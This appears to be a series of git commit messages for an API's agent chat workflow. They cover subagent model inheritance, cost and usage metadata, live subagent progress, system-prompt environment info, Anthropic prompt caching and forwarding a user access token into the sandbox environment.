Also format-fixes askUserQuestionTool.ts toModelOutput arrow
(parentheses around single param flagged by prettier in CI).

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(agent): align AgentContext + model resolution with open-agents

Match open-agents' `tools/utils.ts` + `types.ts` shape so the subagent
inherits the parent's model (rather than the previous hardcoded
SUBAGENT_MODEL_ID):

- AgentContext gains `model: LanguageModel` (required) and
  `subagentModel?: LanguageModel`, mirroring open-agents.
- Introduce DurableAgentContext = Omit<AgentContext, "model" | "subagentModel">
  for the workflow input shape, since LanguageModel instances aren't
  JSON-serializable and can't ride durable Vercel Workflow inputs.
- runAgentStep constructs `callModel = gateway(input.modelId)` once
  per step and merges it into experimental_context — same pattern as
  open-agents' prepareCall in open-harness-agent.ts.
- New getMainModel / getSubagentModel helpers (SRP, one per file)
  mirror open-agents' utility functions: getSubagentModel returns
  `ctx.subagentModel ?? ctx.model`.
- taskTool drops the hardcoded SUBAGENT_MODEL_ID; calls
  getSubagentModel(experimental_context, "task") instead — subagent
  now defaults to the same model the parent is running.
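
A minimal sketch of the durable/hydrated split, assuming a stand-in `LanguageModel` interface and a simplified one-argument `getSubagentModel` (the real helper takes `experimental_context` plus a tool name). `hydrateContext` is a hypothetical name for the merge step.

```typescript
// Stand-in for the AI SDK's LanguageModel; only identity matters here.
interface LanguageModel {
  modelId: string;
}

interface AgentContext {
  sandbox: { workingDirectory: string };
  model: LanguageModel;
  subagentModel?: LanguageModel;
}

// JSON-serializable subset that can travel as durable workflow input.
type DurableAgentContext = Omit<AgentContext, "model" | "subagentModel">;

// Hypothetical merge step: attach the per-step model to the durable input.
function hydrateContext(durable: DurableAgentContext, model: LanguageModel): AgentContext {
  return { ...durable, model };
}

function getSubagentModel(ctx: AgentContext): LanguageModel {
  // Fall back to the parent's model when no override is configured.
  return ctx.subagentModel ?? ctx.model;
}
```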

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): emit per-message cost/usage metadata (cutover Bundle C) (#592)

* feat(chat-workflow): emit per-message cost/usage metadata (Bundle C)

First step in the open-agents → api cutover sequence. Adds a
messageMetadata callback to runAgentStep's toUIMessageStream call so
the UI receives {modelId, lastStepUsage, totalMessageUsage,
lastStepCost, totalMessageCost, stepFinishReasons} on every assistant
turn — matching open-agents' WebAgentMessageMetadata shape byte-for-byte
so sandbox.recoupable.com's model/cost badges keep working when cut
over to /api/chat/workflow.

New (SRP, one function per file):
- lib/agent/messageMetadata/extractGatewayCost.ts — port of
  open-agents' gateway-metadata.ts, parses gateway-reported per-step
  cost from providerMetadata.
- lib/agent/messageMetadata/addLanguageModelUsage.ts — port of
  open-agents' usage.ts, pointwise-sums LanguageModelUsage records.
- lib/agent/messageMetadata/AgentMessageMetadata.ts — type mirroring
  open-agents' WebAgentMessageMetadata.
- lib/agent/messageMetadata/buildMessageMetadataCallback.ts —
  stateful factory returning a fresh callback per turn; accumulates
  usage + cost across finish-step parts.
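
The accumulation performed by the stateful callback might be sketched like this. The `Usage` and part shapes are reduced, hypothetical versions of the SDK types, and the returned object only includes a subset of the metadata fields listed above.

```typescript
// Reduced, hypothetical usage shape; the SDK's LanguageModelUsage has more fields.
interface Usage {
  inputTokens: number;
  outputTokens: number;
  totalTokens: number;
}

// Pointwise sum of two usage records.
function addUsage(a: Usage, b: Usage): Usage {
  return {
    inputTokens: a.inputTokens + b.inputTokens,
    outputTokens: a.outputTokens + b.outputTokens,
    totalTokens: a.totalTokens + b.totalTokens,
  };
}

type StreamPart =
  | { type: "finish-step"; usage: Usage; cost?: number }
  | { type: "text-delta" };

// Factory: each call returns a fresh callback with its own running totals.
function buildMetadataCallback(modelId: string) {
  let totalUsage: Usage | undefined;
  let totalCost = 0;
  return (part: StreamPart) => {
    if (part.type !== "finish-step") return undefined;
    totalUsage = totalUsage ? addUsage(totalUsage, part.usage) : part.usage;
    totalCost += part.cost ?? 0;
    return {
      modelId,
      lastStepUsage: part.usage,
      totalMessageUsage: totalUsage,
      lastStepCost: part.cost,
      totalMessageCost: totalCost,
    };
  };
}
```

Creating the callback per turn keeps totals from one assistant message from leaking into the next.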

Wired into app/lib/workflows/runAgentStep.ts. PROGRESS notes called
this out as a known gap from the original workflow port (PR 4).

Tests: 19 new (6 + 4 + 6 + 3); full suite 3096/3096 pass; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(message-metadata): SRP extractions + upgrade ai SDK; drop normalizeUsage

Address PR review feedback (one exported function per file) and adopt
the user's preferred path of upgrading api's `ai` package rather than
maintaining a normalization shim:

- Extract addTokenCounts.ts (used by addLanguageModelUsage)
- Extract hasGatewayShape.ts + GatewayProviderMetadata.ts (used by
  extractGatewayCost)
- Split AgentStepFinishMetadata into its own file (was co-located
  in AgentMessageMetadata)

Upgrade the AI SDK so the wire format matches open-agents natively:
- ai: 6.0.0-beta.122 → ^6.0.190
- @ai-sdk/anthropic, @ai-sdk/gateway, @ai-sdk/google, @ai-sdk/openai,
  @ai-sdk/mcp: all bumped to latest stable

The new SDK's LanguageModelUsage is the flat shape (top-level
`inputTokens` number + nested `inputTokenDetails`) — identical to
open-agents' wire format. No conversion needed, so:
- Delete normalizeUsage.ts + test (net -82 LOC)
- Delete AgentLanguageModelUsage type (use SDK's LanguageModelUsage
  directly)

Production code changes for the SDK upgrade:
- runAgentStep + setupChatRequest: await convertToModelMessages
  (now returns Promise<ModelMessage[]>)

Tests: 3106/3106 pass; production typecheck clean; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(task-tool): live subagent progress + transcript (Cutover Bundle B) (#594)

Convert taskTool.execute from `async () =>` to `async function*`,
mirroring open-agents' `packages/agent/tools/task.ts`. Yields multiple
chunks during the subagent run so the chat UI can render:

  - An initial "Subagent · 0 tools · 0 tokens" card with stable
    startedAt timestamp
  - A live `pending: {name, input}` indicator for each tool-call
  - Accumulated `usage` after each finish-step
  - A final `{final: ModelMessage[], ...}` chunk containing the full
    subagent transcript for expandable rendering

`toModelOutput` mirrors open-agents' implementation: extracts the
last assistant text part from `output.final` for inclusion in the
parent agent's context.
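
The generator-based progress reporting can be illustrated with a self-contained sketch. The event and chunk shapes are simplified assumptions (no usage accounting, plain text messages instead of `ModelMessage`), and `runSubagent`, `lastAssistantText`, and `collect` are hypothetical names.

```typescript
type TranscriptMessage = { role: "assistant" | "tool"; text: string };

interface ProgressChunk {
  startedAt: number;
  toolCallCount: number;
  pending?: { name: string; input: unknown };
  final?: TranscriptMessage[];
}

// Hypothetical event list standing in for the subagent's stream output.
type SubagentEvent =
  | { type: "tool-call"; name: string; input: unknown }
  | { type: "text"; text: string };

async function* runSubagent(events: SubagentEvent[]): AsyncGenerator<ProgressChunk> {
  const startedAt = Date.now(); // stays the same on every chunk
  let toolCallCount = 0;
  const transcript: TranscriptMessage[] = [];
  yield { startedAt, toolCallCount }; // initial card

  for (const event of events) {
    if (event.type === "tool-call") {
      toolCallCount += 1;
      transcript.push({ role: "tool", text: event.name });
      yield { startedAt, toolCallCount, pending: { name: event.name, input: event.input } };
    } else {
      transcript.push({ role: "assistant", text: event.text });
    }
  }
  yield { startedAt, toolCallCount, final: transcript }; // full transcript last
}

// What the parent agent would see: the last assistant text in the transcript.
function lastAssistantText(chunk: ProgressChunk): string | undefined {
  const messages = chunk.final ?? [];
  for (let i = messages.length - 1; i >= 0; i--) {
    if (messages[i].role === "assistant") return messages[i].text;
  }
  return undefined;
}

async function collect(events: SubagentEvent[]): Promise<ProgressChunk[]> {
  const chunks: ProgressChunk[] = [];
  for await (const chunk of runSubagent(events)) chunks.push(chunk);
  return chunks;
}
```

Intermediate chunks drive the live card in the UI, while only the text extracted from the final chunk needs to enter the parent's context.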

New (SRP, one function per file):
- lib/agent/messageMetadata/sumLanguageModelUsage.ts — wraps
  addLanguageModelUsage to handle undefined inputs without
  introducing zero-tokens placeholders.

Drive-by fix: askUserQuestionTool's `toModelOutput` signature was
`(output) =>` from the older beta SDK era. The current SDK
(ai@^6.0.190) passes `({ toolCallId, input, output })`. Updated to
`({ output }) =>` so the function actually receives the user's
answers at runtime — was previously falling through to the generic
"User responded to questions." path. Tests updated to match.

Tests: 25 new/updated (12 taskTool + 4 sumLanguageModelUsage + 9
askUserQuestion); full suite 3114/3114 pass; lint clean.

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): thread real cwd + currentBranch into system prompt (cutover Bundle A.7) (#597)

* feat(chat-workflow): thread real cwd + currentBranch into system prompt (Bundle A.7)

Third open-agents → api cutover bundle. The handler hardcoded
`workingDirectory: DEFAULT_WORKING_DIRECTORY` and never set
`currentBranch`, so the agent had no environment info in its system
prompt and had to run `pwd` / `git branch` on every turn.

Production verification (today, before this fix):
  agent: "My system prompt does not contain working directory or
         branch information."

After this fix the agent receives an Environment section + Current
branch line + cloud-sandbox checkpointing block — same shape as
open-agents (sandbox.recoupable.com) emits.

Changes:
- New `lib/chat/buildAgentSystemPrompt.ts` (SRP) — assembles
  environment section → Current branch → cloud-sandbox checkpointing
  → custom instructions, all conditional on inputs. Mirrors
  open-agents' `buildSystemPrompt` (packages/agent/system-prompt.ts).
- New `lib/chat/cloudSandboxInstructions.ts` (SRP) — ports
  open-agents' `CLOUD_SANDBOX_INSTRUCTIONS` block with `{branch}`
  placeholder substitution.
- `handleChatWorkflowStream`: connect the sandbox once for both skill
  discovery AND cwd/branch reading, then thread real values into
  `AgentContext.sandbox.workingDirectory` + `.currentBranch`. On
  connect failure, fall back to DEFAULT_WORKING_DIRECTORY (preserves
  today's behavior; tools surface real errors later when they
  reconnect).
- `runAgentStep`: build the system prompt via
  `buildAgentSystemPrompt({cwd, currentBranch, customInstructions})`
  instead of using the static `agentCustomInstructions` directly.
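
The conditional assembly described for `buildAgentSystemPrompt` can be sketched as below. The section wording is placeholder text (the actual Environment section is not reproduced in this message), the cloud-sandbox checkpointing block is omitted, and the option names follow the call shown above.

```typescript
interface SystemPromptOptions {
  cwd?: string;
  currentBranch?: string;
  customInstructions?: string;
}

function buildAgentSystemPrompt(options: SystemPromptOptions): string {
  const sections: string[] = [];
  if (options.cwd) {
    // Placeholder wording; the real Environment section text is an unknown here.
    sections.push(`# Environment\nWorking directory: ${options.cwd}`);
  }
  if (options.currentBranch) {
    sections.push(`Current branch: ${options.currentBranch}`);
  }
  if (options.customInstructions) {
    sections.push(options.customInstructions);
  }
  // Sections that were not provided simply do not appear.
  return sections.join("\n\n");
}
```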

Scope reduced from the original "A.7+9" bundle: dropped contextLimit
plumbing because it's a client-side display concern in open-agents,
not server-side model routing (verified via grep — open-agents'
server never reads context.contextLimit either).

Tests: 7 new (6 buildAgentSystemPrompt + 1 runAgentStep wiring);
full suite 3121/3121 pass; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* chore(chat-workflow): drop currentBranch handling from system prompt

Per direction: branch is always `main` (the default branch) in api's
deployment topology, so the per-branch `Current branch: <name>` line
and cloud-sandbox checkpointing block don't add information today.
Strip the templating to keep the system prompt focused on what's
load-bearing (the Environment section indicating workspace-relative
paths).

- Delete `lib/chat/cloudSandboxInstructions.ts` (was a port of
  open-agents' CLOUD_SANDBOX_INSTRUCTIONS, only useful with a real
  per-session branch)
- Drop `currentBranch` from `buildAgentSystemPrompt` options +
  rendering
- Stop reading `sandbox.currentBranch` in handleChatWorkflowStream
  (the field stays on AgentContext.sandbox for type completeness;
  also consumed by createSandboxHandler unchanged)
- Remove branch-related test cases

Can be re-added later if/when meaningful per-session branches (e.g.
xx/abcdef12 generated branches) land.

Tests: 3119/3119 pass; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix(chat-workflow): drop stale currentBranch arg from buildAgentSystemPrompt call

Build failure on bf1e245 — runAgentStep was still passing
`currentBranch: input.agentContext.sandbox.currentBranch` after
buildAgentSystemPrompt's option was removed. Stripping it.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): Anthropic prompt cache control (Bundle A.6) (#599)

Fourth open-agents → api cutover bundle. runAgentStep was sending the
same system prompt + tool definitions on every turn as fresh input,
even though Anthropic prompt caching can shave up to 90% off the cost of
cached input on later turns. Production traces showed `cacheReadTokens: 0` on every
api turn, while open-agents shows cacheRead matching cacheWrite from
the prior turn — i.e. open-agents reuses the cached prefix.

Changes (SRP — one function per file):
- `lib/agent/contextManagement/isAnthropicModel.ts` — predicate
  port of open-agents'
  `packages/agent/context-management/cache-control.ts:5`.
- `lib/agent/contextManagement/addCacheControlToTools.ts` — marks
  the LAST tool with `cacheControl: { type: "ephemeral" }`. Last-only
  conserves Anthropic's 4-breakpoint limit.
- `lib/agent/contextManagement/addCacheControlToMessages.ts` —
  marks the LAST message with `cacheControl` on every step, per
  Anthropic's "mark the final block of the final message" guidance.

`runAgentStep` now:
- Wraps the tool set via `addCacheControlToTools(...)` before passing
  to streamText (static — set once per step).
- Adds a `prepareStep` callback that wraps `messages` via
  `addCacheControlToMessages(...)` on every internal model call.
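
The "mark only the last entry" rule can be sketched on plain objects. The `Tool` and `Message` shapes are simplified assumptions, and the top-level `cacheControl` field follows the wording of this message; how the marker is actually attached in the AI SDK is not shown here.

```typescript
type CacheControl = { type: "ephemeral" };
const EPHEMERAL: CacheControl = { type: "ephemeral" };

// Simplified, hypothetical shapes for illustration only.
interface Tool {
  description: string;
  cacheControl?: CacheControl;
}
interface Message {
  role: string;
  content: string;
  cacheControl?: CacheControl;
}

function addCacheControlToTools(tools: Record<string, Tool>): Record<string, Tool> {
  const names = Object.keys(tools);
  if (names.length === 0) return tools;
  const lastName = names[names.length - 1];
  // Copy so the caller's tool record is not mutated; mark only the last tool.
  return { ...tools, [lastName]: { ...tools[lastName], cacheControl: EPHEMERAL } };
}

function addCacheControlToMessages(messages: Message[]): Message[] {
  return messages.map((message, index): Message =>
    index === messages.length - 1 ? { ...message, cacheControl: EPHEMERAL } : message,
  );
}
```

Marking one tool and one message uses two breakpoints per request, which leaves headroom under the 4-breakpoint limit mentioned above.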

Production behavior reproducer (Haiku 4.5, identical 2-turn prompt
to both backends):
  api prod (broken): turn1 cacheWrite=0 cacheRead=0 cost=$0.005952
                     turn2 cacheWrite=0 cacheRead=0 cost=$0.005959
                     → flat cost; full input billed every turn.
  open-agents prod:  turn1 cacheWrite=10966 cacheRead=0
                     turn2 cacheWrite=12    cacheRead=10966 cost drops 12x
                     → near-full prefix re-read from cache on turn 2.

After this PR, api should match open-agents' caching curve.

Tests: 19 new (7 isAnthropicModel + 5 addCacheControlToTools + 5
addCacheControlToMessages + 2 runAgentStep wiring assertions); full
suite 3138/3138 pass; lint clean.

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): forward Privy JWT as RECOUP_ACCESS_TOKEN (Bundle A.4) (#601)

Fifth and final open-agents → api cutover bundle. The chat UI sends a
short-lived Privy JWT in the workflow request body as
`recoupAccessToken`. Today api silently strips it via Zod's default
`.strip()` mode and never plumbs it into the sandbox env, so the
`recoup-api` skill's curl examples can't authenticate as the user.

Production reproducer (today, before this fix):
  api prod:        recoup-api skill loads. curl returns
                   "RECOUP_ACCESS_TOKEN is not set" → 401.
                   Agent: "you need to sign in."
  open-agents prod: recoup-api skill loads. curl returns HTTP 200
                   with the user's account_id.

Plumbing (all three layers TDD red → green):
- lib/chat/validateChatWorkflow.ts — accept
  `recoupAccessToken: z.string().min(1).max(8192).optional()` in the
  body schema. Open-agents-shape compatible.
- lib/agent/tools/AgentContext.ts — add `recoupAccessToken?: string`
  field. Mirrors open-agents'
  `packages/agent/types.ts:29`.
- lib/chat/handleChatWorkflowStream.ts — conditionally spread the
  token into `agentContext` when validator surfaced it.
- lib/agent/tools/buildRecoupExecEnv.ts — inject
  `RECOUP_ACCESS_TOKEN` into the sandbox exec env when the field is
  set. The recoup-api skill's curl examples reference this env var.

Security note: only forward the token when the caller sent it in the
body (chat UI path). x-api-key callers don't set this field, so their
long-lived `recoup_sk_…` key is never exfiltratable from the sandbox
env. This restriction is carried over from the prior code comment.
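
A minimal sketch of the forward-only-when-present rule, assuming a context reduced to the single token field. `buildContext` is a hypothetical stand-in for the handler's conditional spread.

```typescript
interface ExecEnvContext {
  recoupAccessToken?: string;
}

function buildRecoupExecEnv(context: ExecEnvContext): Record<string, string> {
  // Only forward a token the caller explicitly sent; never fall back to an API key.
  if (!context.recoupAccessToken) return {};
  return { RECOUP_ACCESS_TOKEN: context.recoupAccessToken };
}

// Handler-side conditional spread, so the key is absent rather than undefined.
function buildContext(validatedToken?: string): ExecEnvContext {
  return { ...(validatedToken ? { recoupAccessToken: validatedToken } : {}) };
}
```

Callers that authenticate with an API key never populate the field, so nothing reaches the sandbox environment for them.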

Tests: 5 new (3 buildRecoupExecEnv + 1 validator + 1 handler);
plus 1 handler omit-when-undefined assertion. Full suite 3144/3144
pass; lint clean.

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>